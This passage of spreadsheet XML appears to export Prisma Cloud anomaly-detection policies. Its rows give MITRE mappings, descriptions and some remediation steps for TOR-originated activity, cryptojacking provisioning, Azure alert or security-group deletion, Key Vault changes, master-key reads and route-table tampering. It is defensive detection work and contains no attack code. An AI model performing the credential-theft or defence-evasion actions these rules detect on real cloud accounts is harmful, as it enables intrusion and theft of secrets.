          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1541" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to compute services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1541"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41" t="inlineStr"/>
      <c r="Z1541" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1541" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1541" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1541" t="inlineStr"/>
      <c r="AD1541" t="b">
        <v>1</v>
      </c>
      <c r="AE1541" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1541" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>960e6b38-f098-436e-a701-f8c538984986</t>
        </is>
      </c>
      <c r="AI1541" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1541" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1541" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1542">
      <c r="A1542"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42" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1542" s="2" t="inlineStr"/>
      <c r="D1542" t="inlineStr"/>
      <c r="E1542" t="inlineStr"/>
      <c r="F1542" t="inlineStr"/>
      <c r="G1542" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1542" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1542" t="inlineStr">
        <is>
          <t>Suspicious activity in Media services</t>
        </is>
      </c>
      <c r="L1542" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1542" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1542" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1542" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1542" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1542" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1542" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1542" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1542" t="b">
        <v>0</v>
      </c>
      <c r="U1542" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1542" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1542" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to media services that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1542"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42" t="inlineStr"/>
      <c r="Z1542" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1542" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1542" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1542" t="inlineStr"/>
      <c r="AD1542" t="b">
        <v>1</v>
      </c>
      <c r="AE1542" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1542" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>00111623-2d7d-4b61-80bc-3530bbcb7ca6</t>
        </is>
      </c>
      <c r="AI1542" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1542" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1542" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1543">
      <c r="A1543"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43" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1543" s="2" t="inlineStr"/>
      <c r="D1543" t="inlineStr"/>
      <c r="E1543" t="inlineStr"/>
      <c r="F1543" t="inlineStr"/>
      <c r="G1543" t="b">
        <v>1</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1543" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1543" t="inlineStr">
        <is>
          <t>Suspicious activity in AI / ML services</t>
        </is>
      </c>
      <c r="L1543" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1543" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1543" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1543" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1543" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1543" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1543" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1543" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1543" t="b">
        <v>0</v>
      </c>
      <c r="U1543" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1543" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1543" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to AI / ML that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1543"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43" t="inlineStr"/>
      <c r="Z1543" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1543" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1543" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1543" t="inlineStr"/>
      <c r="AD1543" t="b">
        <v>1</v>
      </c>
      <c r="AE1543" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1543" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>0c946187-10ed-487e-9726-be6c392563f1</t>
        </is>
      </c>
      <c r="AI1543" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1543" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1543" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B1544" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1544" s="2" t="inlineStr"/>
      <c r="D1544" t="inlineStr"/>
      <c r="E1544" t="inlineStr"/>
      <c r="F1544" t="inlineStr"/>
      <c r="G1544" t="b">
        <v>0</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1544" t="inlineStr">
        <is>
          <t>crypto_jacking_anomaly</t>
        </is>
      </c>
      <c r="K1544" t="inlineStr">
        <is>
          <t>Anomalous compute provisioning activity</t>
        </is>
      </c>
      <c r="L1544" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M1544" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1544" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1544" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1544" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1544" t="inlineStr">
        <is>
          <t>TA0040</t>
        </is>
      </c>
      <c r="R1544" t="inlineStr">
        <is>
          <t>T1496 - Resource Hijacking (TA0040)</t>
        </is>
      </c>
      <c r="S1544" t="inlineStr">
        <is>
          <t>Impact,Prisma_Cloud,Resource Misuse</t>
        </is>
      </c>
      <c r="T1544" t="b">
        <v>0</v>
      </c>
      <c r="U1544" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1544" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1544" t="inlineStr">
        <is>
          <t>Detects unusual activity related to the provisioning of compute resources within a short period of time involving a high number of instances created. The policy also considers if the activity originates from TOR exit nodes or multiple distant locations. The provisioning behavior typically indicates the creation of unauthorized compute instances for cryptojacking purposes. This policy uses write events.</t>
        </is>
      </c>
      <c r="X1544" t="inlineStr">
        <is>
          <t>1. Review the credentials (access or secret keys) used in the incident to spin up the instances. Determine if the credentials were unintentionally exposed, for example in a code repository or cloud storage space, and restrict access to these resources.
2. If credentials were stolen, delete all the instances created during the incident.
3. Scan existing (pre-incident) instances accessed with the stolen credentials, for malware presence. Backdoors might have been planted to maintain access to your cloud environment.
4. Review your logs to determine the first time these credentials were used in the cloud environment and the different resources accessed, as this will also help determine the scope of the incident.</t>
        </is>
      </c>
      <c r="Y1544" t="inlineStr"/>
      <c r="Z1544" t="inlineStr">
        <is>
          <t>crypto_jacking_anomaly</t>
        </is>
      </c>
      <c r="AA1544" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1544" t="inlineStr">
        <is>
          <t>2024-11-13 14:14:24</t>
        </is>
      </c>
      <c r="AC1544" t="inlineStr"/>
      <c r="AD1544" t="b">
        <v>1</v>
      </c>
      <c r="AE1544" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1544" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>e64fb48f-7d36-2309-dda2-2304c689116c</t>
        </is>
      </c>
      <c r="AI1544" t="inlineStr">
        <is>
          <t>crypto_jacking_anomaly</t>
        </is>
      </c>
      <c r="AJ1544" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1544" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated],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v13.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, Matt's ATT&amp;ACK</t>
        </is>
      </c>
      <c r="B1545" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1545" s="2" t="inlineStr"/>
      <c r="D1545" t="inlineStr"/>
      <c r="E1545" t="inlineStr"/>
      <c r="F1545" t="inlineStr"/>
      <c r="G1545" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1545" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1545" t="inlineStr">
        <is>
          <t>Suspicious activity in IoT services</t>
        </is>
      </c>
      <c r="L1545" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1545" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1545" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1545" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1545" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1545" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1545" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1545" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1545" t="b">
        <v>0</v>
      </c>
      <c r="U1545" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1545" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1545" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to IoT that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1545"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45" t="inlineStr"/>
      <c r="Z1545" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1545" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1545" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1545" t="inlineStr"/>
      <c r="AD1545" t="b">
        <v>1</v>
      </c>
      <c r="AE1545" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1545" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>70dd4103-f788-4e8a-bd59-50393b1e2b78</t>
        </is>
      </c>
      <c r="AI1545" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1545" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1545" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" t="inlineStr"/>
      <c r="B1546" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1546" s="2" t="inlineStr"/>
      <c r="D1546" t="inlineStr"/>
      <c r="E1546" t="inlineStr"/>
      <c r="F1546" t="inlineStr"/>
      <c r="G1546" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1546" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1546" t="inlineStr">
        <is>
          <t>Azure Compute workload disabling Azure alerts</t>
        </is>
      </c>
      <c r="L1546" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1546" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1546" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1546" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1546" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1546" t="inlineStr"/>
      <c r="R1546" t="inlineStr"/>
      <c r="S1546" t="inlineStr">
        <is>
          <t>Defense Evasion</t>
        </is>
      </c>
      <c r="T1546" t="b">
        <v>0</v>
      </c>
      <c r="U1546" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1546" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1546" t="inlineStr">
        <is>
          <t>Detects an Azure Compute workload deleting Azure Monitor alert rules. An Azure monitor alert rule monitors your telemetry and captures a signal that indicates that something is happening on the specified resource. Adversaries may attempt to delete these rules to avoid getting detected.</t>
        </is>
      </c>
      <c r="X1546"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46" t="inlineStr"/>
      <c r="Z1546" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1546" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1546" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:06</t>
        </is>
      </c>
      <c r="AC1546" t="inlineStr"/>
      <c r="AD1546" t="b">
        <v>1</v>
      </c>
      <c r="AE1546" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1546" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>79c81276-d2fa-4cfb-86f0-f0d1b6a87059</t>
        </is>
      </c>
      <c r="AI1546" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1546" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1546" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1547">
      <c r="A1547" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1547" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1547" s="2" t="inlineStr"/>
      <c r="D1547" t="inlineStr"/>
      <c r="E1547" t="inlineStr"/>
      <c r="F1547" t="inlineStr"/>
      <c r="G1547" t="b">
        <v>1</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1547" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1547" t="inlineStr">
        <is>
          <t>Azure Compute workload deleting network security groups</t>
        </is>
      </c>
      <c r="L1547" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1547" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1547" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1547" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1547" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1547" t="inlineStr">
        <is>
          <t>1.1 Anomaly</t>
        </is>
      </c>
      <c r="R1547" t="inlineStr">
        <is>
          <t>1.1.1 Anomaly - All</t>
        </is>
      </c>
      <c r="S1547" t="inlineStr">
        <is>
          <t>Defense Evasion</t>
        </is>
      </c>
      <c r="T1547" t="b">
        <v>0</v>
      </c>
      <c r="U1547" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1547" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1547" t="inlineStr">
        <is>
          <t>Detects an Azure Compute workload deleting network security groups. Azure network security groups contain security rules to filter network traffic between Azure resources in an Azure virtual network. Attackers routinely attempt to delete these groups to allow traffic to flow through.</t>
        </is>
      </c>
      <c r="X1547"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47" t="inlineStr"/>
      <c r="Z1547" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1547" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1547" t="inlineStr">
        <is>
          <t>2023-07-20 17:24:13</t>
        </is>
      </c>
      <c r="AC1547" t="inlineStr"/>
      <c r="AD1547" t="b">
        <v>1</v>
      </c>
      <c r="AE1547" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1547" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>79c81276-8482-4e29-936c-dd8957172b25</t>
        </is>
      </c>
      <c r="AI1547" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1547" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1547" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" t="inlineStr"/>
      <c r="B1548" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1548" s="2" t="inlineStr"/>
      <c r="D1548" t="inlineStr"/>
      <c r="E1548" t="inlineStr"/>
      <c r="F1548" t="inlineStr"/>
      <c r="G1548" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1548" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1548" t="inlineStr">
        <is>
          <t>Azure Compute workload modifying Key Vault configurations</t>
        </is>
      </c>
      <c r="L1548" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1548" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1548" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1548" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1548" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1548" t="inlineStr"/>
      <c r="R1548" t="inlineStr"/>
      <c r="S1548" t="inlineStr">
        <is>
          <t>Privilege Escalation</t>
        </is>
      </c>
      <c r="T1548" t="b">
        <v>0</v>
      </c>
      <c r="U1548" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1548" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1548" t="inlineStr">
        <is>
          <t>Detects an Azure Compute workload modifying the configuration of a key vault. The Azure Key Vault is a cloud service for securely storing and accessing secrets, like encryption keys and passwords. Attackers commonly attempt to steal secrets to elevate their permissions.</t>
        </is>
      </c>
      <c r="X1548"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48" t="inlineStr"/>
      <c r="Z1548" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1548" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1548" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:06</t>
        </is>
      </c>
      <c r="AC1548" t="inlineStr"/>
      <c r="AD1548" t="b">
        <v>1</v>
      </c>
      <c r="AE1548" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1548" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>79c81276-f6c5-4a84-89cd-a135190c4dae</t>
        </is>
      </c>
      <c r="AI1548" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1548" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1548" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" t="inlineStr"/>
      <c r="B1549" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1549" s="2" t="inlineStr"/>
      <c r="D1549" t="inlineStr"/>
      <c r="E1549" t="inlineStr"/>
      <c r="F1549" t="inlineStr"/>
      <c r="G1549" t="b">
        <v>1</v>
      </c>
      <c r="H15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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1549" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1549" t="inlineStr">
        <is>
          <t>Azure user reading database master keys</t>
        </is>
      </c>
      <c r="L1549" t="inlineStr">
        <is>
          <t>CREDENTIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1549" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1549" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1549" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1549" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1549" t="inlineStr"/>
      <c r="R1549" t="inlineStr"/>
      <c r="S1549" t="inlineStr">
        <is>
          <t>Credential Access</t>
        </is>
      </c>
      <c r="T1549" t="b">
        <v>0</v>
      </c>
      <c r="U1549" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1549" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1549" t="inlineStr">
        <is>
          <t>Detects an Azure user reading master keys from Cosmos DB. The Azure master database key is a symmetric key used to protect the private keys of certificates and asymmetric keys that are present in the database.</t>
        </is>
      </c>
      <c r="X1549" t="inlineStr">
        <is>
          <t>1. Leverage Prisma Cloud user behavior analytics visualization on the Prisma Cloud platform to understand all the details related to this alert.
2. If it is determined through further investigation that the activity originated from a malicious insider or outsider, disable the user account until further investigation is done.</t>
        </is>
      </c>
      <c r="Y1549" t="inlineStr"/>
      <c r="Z1549" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1549" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1549" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:06</t>
        </is>
      </c>
      <c r="AC1549" t="inlineStr"/>
      <c r="AD1549" t="b">
        <v>1</v>
      </c>
      <c r="AE1549" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1549" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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49" t="inlineStr">
        <is>
          <t>79c81276-5ec3-4191-b51a-246ff9b6a0a9</t>
        </is>
      </c>
      <c r="AI1549" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1549" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1549" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1550" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1550" s="2" t="inlineStr"/>
      <c r="D1550" t="inlineStr"/>
      <c r="E1550" t="inlineStr"/>
      <c r="F1550" t="inlineStr"/>
      <c r="G1550" t="b">
        <v>0</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1550" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1550" t="inlineStr">
        <is>
          <t>Azure Compute workload creating or modifying route tables</t>
        </is>
      </c>
      <c r="L1550" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1550" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1550" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1550" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1550" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1550" t="inlineStr">
        <is>
          <t>1.1 Anomaly</t>
        </is>
      </c>
      <c r="R1550" t="inlineStr">
        <is>
          <t>1.1.1 Anomaly - All</t>
        </is>
      </c>
      <c r="S1550" t="inlineStr">
        <is>
          <t>Lateral Movement,Defense Evasion</t>
        </is>
      </c>
      <c r="T1550" t="b">
        <v>0</v>
      </c>
      <c r="U1550" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1550" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1550" t="inlineStr">
        <is>
          <t>Detects an Azure Compute workload creating or modifying Azure routing tables. Azure routing tables are used to route traffic between Azure subnets and virtual networks. Adversaries attempt to compromise these routing tables to divert traffic to their desired destinations.</t>
        </is>
      </c>
      <c r="X1550"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50" t="inlineStr"/>
      <c r="Z1550" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1550" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1550" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:44</t>
        </is>
      </c>
      <c r="AC1550" t="inlineStr"/>
      <c r="AD1550" t="b">
        <v>1</v>
      </c>
      <c r="AE1550" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1550" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>79c81276-9e61-4106-a4a3-f0a506e5058e</t>
        </is>
      </c>
      <c r="AI1550" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1550" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1550" t="inlineStr">
